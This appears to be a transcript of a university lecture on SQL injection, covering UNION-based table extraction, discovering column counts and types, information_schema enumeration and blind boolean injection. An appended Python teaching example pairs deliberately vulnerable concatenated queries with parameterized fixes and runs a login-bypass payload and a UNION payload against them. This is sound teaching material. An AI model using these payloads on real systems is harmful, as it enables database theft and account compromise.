So I already know that the resulting table is going to be id, name and price. So the first elements that are going to be returned will be the results of whatever this query is. If we then change brand to be "foo tick space union", so "quote union select", let's say star, from users, that I really want. I actually don't care about the products; I can crawl the website and get all the products. I want users, and I probably don't want the "where blah blah blah blah", and I'll do dash dash to get rid of everything, and we're good. So now the query becomes select id, name, price from products where brand is equal to foo union select star from users. This will not work. Why won't this work? What was that? No, because the queries are distinct, so we have two different select queries here. We have this select query, select whatever this, and then we have this select query. So I guess the first thing to say is, are each of these valid queries? It's syntactically valid, yes. What is the... you can think of how many columns are returned in the first query? How many columns are returned in the second query? We don't know. What's the user table look like? Well, let's say a user table has, uh, id, name, or, like, username, money, social security numbers, credit card number. Right, so let's say it has, when we do 456, it has six columns. So, actually, I don't know if I'm going to say something wrong, but that's okay. So it should give us an error, because it can't union these two tables together, because one table has three columns and the other table has seven columns. So it fundamentally cannot do that. So how do we change our query to fix that problem? Yeah, exactly. So change star; star will return every column from users. I know I want three. Could we do id, 1, 1? id and then one. So we know that we already are getting the columns one, two and three. Yeah, could we get columns four, five, six? Just to try whether it catches the next columns. Interesting. Okay.
So the one thing is, actually, the names don't matter. The name is going to be used from whatever is in the first column, based on the semantics of union. So basically these results will be essentially appended in there. So the code that loops over it doesn't know that it came from this other table. It still thinks like it came from this... whatever, it just knows that the returned column is named id, name, price. So the name is going to be different. But we want, let's say, id, username and maybe pass. That could be nice, right. So now this table will say, okay, product one is named evas and the price is 10, and product two is... oh, our brand is foo. Okay, so foo, what would brand foo have? Let's say a bar and evas. That makes sense, and evas is much more expensive. And then it's going to union the id, name and password from all of the users in the user table. So this will be id, probably one again, because there's probably a user of id one. The name will probably be admin and the password will probably be admin. And two, the next person, bob, signed up for a thing. He has a very terrible password, which is "password", and so on and so forth. And when the resulting code, the PHP code, loops over these records, what is it going to likely do for everything that's returned? But where did this query... I mean, imagine some web application showing you all of the products that are from a certain brand, right? So what does it need? It needs the id to show you where to go. It needs the name to show you what the name of the product is. It needs the price to show you the price. But again, these are just strings that are being returned.
It's iterated over in this loop. So it's going to create a product with an id one, a name of admin and a price of admin, the same as an id two, a name of bob and a price of password. And we'll do that for every single user in our table, because it just loops over all of the returned results. So by doing this, now we can extract information from other tables, but we had to know some important pieces of information. What do we need to know? So we need to know the column names: we need to know the id, the username and the pass. What else do we need to know? The table name; you need to know there's a table named users. That's probably a good guess, but we need to know that. What else do we need to know? We needed to know the number of columns in the original query, right, and possibly the type of the column, depending on the database. Yeah, this could fail because price could be an int column, and so it would say that you can't do that union, and it would fail. But we can work around actually 100% all of those issues. So, cool, so one thing, yeah, okay, so one thing we can do is we can use the fact that when we give a union, if the number of columns do not match, then it will return a syntax error, like a 500 error, but if it does match, then we're good. But we don't yet know what table we want, so what we can do is we can do union select null, and this will create essentially a row with one column whose type is null, which could be anything. And so this will succeed only if the original query had only one column. And we can just keep doing this and make iterative approaches: keep going, no, no, no, we get to here and it would say yes, this query succeeded, and we would see an extra product with id null, name null and price null, which would be cool and say we're on the right track. Now we can actually figure out the type of each column. First, by doing the same thing and putting in a hard-coded string for each of the nulls, and if that succeeds, we know the first column is a string. If that succeeds, we know the second column is a string. If that succeeds, then we know the third column is a string. If it's not a string, then we try integers, we try boolean, we try all the data types of the SQL query. And then, in a completely black-box manner, without knowing anything about the original part of our query, we're able to know how many columns there were and what the type of each column was. But we still need to know the names of the table and possible column names, which is tricky. So there's no standard way to do this in SQL. There's no standard "just give me the table names that you have." But every specific database engine has a way to query: what are the tables, what are all the tables in this database? And then, for every table, what are the columns in this table? And so from that you extract information about every table in the database, then you may extract information about every column, and there you start sucking down all the information from all of the columns. So Oracle has a user_objects table. Really, you just look this up; that's the way. MS SQL has this. MySQL, it's in information_schema.tables, you can extract all the table names, and the information_schema.columns table, you can extract all the columns here. And these are standard, so for each of these tables it is fixed what the column names are and how to query that table for that information. So using these two techniques, you can extract all of the information here. But we have to extract this information. How? What was the application doing in order for us to get that username, password? It was querying the database and then returning to us, in the HTML result, the data from the database. But does the login return us the results of the login?
No, all it does is log us in, right? It's a query that we don't see the output of. And this frequently happens, where there'll be multiple queries where you don't directly see the output. And so, but even without that, so even without the ability to get the output, a SQL injection vulnerability allows you to completely pull down the database. And so the idea here is, if you can't... these are called blind SQL injections, and you cannot see the resulting response from the data returned, and usually, so what you will get, you do get one bit of information. You get either, well, you know, a 500 error if there's an error, and so that's one bit of information. So that's what tells you if there's a SQL injection vulnerability: you'll get some 500. But even if you get no response back, no error message or anything, you can still do that. So imagine a web application that has a press release. So this is just like the blog that has some id. The SQL query is select title, description from press releases where id is equal to five, and all the error messages are filtered. So, okay, cool. So the idea is we use this idea of "and 1=1". So id five and 1=1 should return what? It should return page five, just the same result as accessing id equals five. Right, so this should be exactly the same. So the idea is we know 1=1 is already true, and we can ask boolean queries of the database engine, using that to extract data bit by bit from the SQL server for every query, allowing us to extract all of the data from the database. It is super cool.
So we could do something like, we could ask a query like, is the current user's name hacker? Right, we could say five and username equals hacker. So if that is true, we know we will get the page with five; if it's false, we will get an error page that says there's no page for that id. So that tells us one bit of information, but that's not really enough. But what we can do is, we can actually do byte-by-byte searches on values that we want and use a... what's the thing I'm looking at? A binary search. Yes, that's the term, thank you. So we use a binary search, so we can ask, is... we want id five and substring of username, 1, 1, which is going to give us the first character of the username, and we want to know if that's less than a question mark, and a question mark here, I believe, is kind of the middle of the alphabet of the ASCII characters. So if that's true, then we know... well, we write binary search and I explain it. So that would obviously rule out one half, and then we test the other half until we know exactly what the character is. And then we change it, get the second character, do the same thing, do the next character, so on and so forth, doing this over and over again. And the cool thing is there are tools out there. There's a tool called sqlmap, sqlmap, open source. So you download that, and it will do this a hundred percent for you. So you find the SQL injection, you plug it into the tool, and it downloads the entire database, which is awesome. Cool. All right. See you on Monday.
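The login bypass (tick or 1=1 dash dash) and the UNION extraction walked through in this lecture, as an added example that is not part of the transcript or the course materials: each concatenated query is paired with its parameterized form and run against a constructed in-memory SQLite database, so the bypass succeeds on the first and the same input is treated as plain data by the second. Table and column names (users, products, brand) and the sample rows are assumptions chosen to mirror the lecture's slides.

```python
"""Added example (not from the lecture): concatenated SQL beside
parameterized SQL, run against a constructed in-memory SQLite database."""
import sqlite3


def make_db():
    """Build a constructed sample database mirroring the lecture's tables.

    Table and column names are assumptions chosen to match the slides;
    the rows are made up.
    """
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'admin'), (2, 'bob', 'password');
        CREATE TABLE products (id INTEGER, name TEXT, price INTEGER, brand TEXT);
        INSERT INTO products VALUES (1, 'evas', 10, 'foo'), (2, 'bar', 100, 'foo');
    """)
    return con


def login_vulnerable(con, username, password):
    """The lecture's pattern: user input concatenated straight into SQL.

    A username of  ' OR 1=1 --  closes the string literal, adds a
    tautology and comments out the password check, so every users row
    comes back (and a "exactly one row" check would also fail).
    """
    query = ("SELECT * FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return con.execute(query).fetchall()


def login_safe(con, username, password):
    """Parameterized form: the input is bound as data and never parsed as SQL."""
    query = "SELECT * FROM users WHERE username = ? AND password = ?"
    return con.execute(query, (username, password)).fetchall()


def products_vulnerable(con, brand):
    """Brand search built by concatenation, open to the UNION trick:
    a payload selecting three columns from users rides along with the
    three product columns, and the caller renders it as products."""
    query = "SELECT id, name, price FROM products WHERE brand = '" + brand + "'"
    return con.execute(query).fetchall()


def products_safe(con, brand):
    """Parameterized brand search: the payload is just a brand that does not exist."""
    query = "SELECT id, name, price FROM products WHERE brand = ?"
    return con.execute(query, (brand,)).fetchall()


# Constructed payloads, spelled out in the lecture.
BYPASS = "' OR 1=1 --"
UNION_PAYLOAD = "foo' UNION SELECT id, username, password FROM users --"


def main():
    con = make_db()
    print("vulnerable login rows:", login_vulnerable(con, BYPASS, "x"))    # both users
    print("safe login rows:", login_safe(con, BYPASS, "x"))                # []
    print("vulnerable products:", products_vulnerable(con, UNION_PAYLOAD))  # users leak
    print("safe products:", products_safe(con, UNION_PAYLOAD))             # []


if __name__ == "__main__":
    main()
```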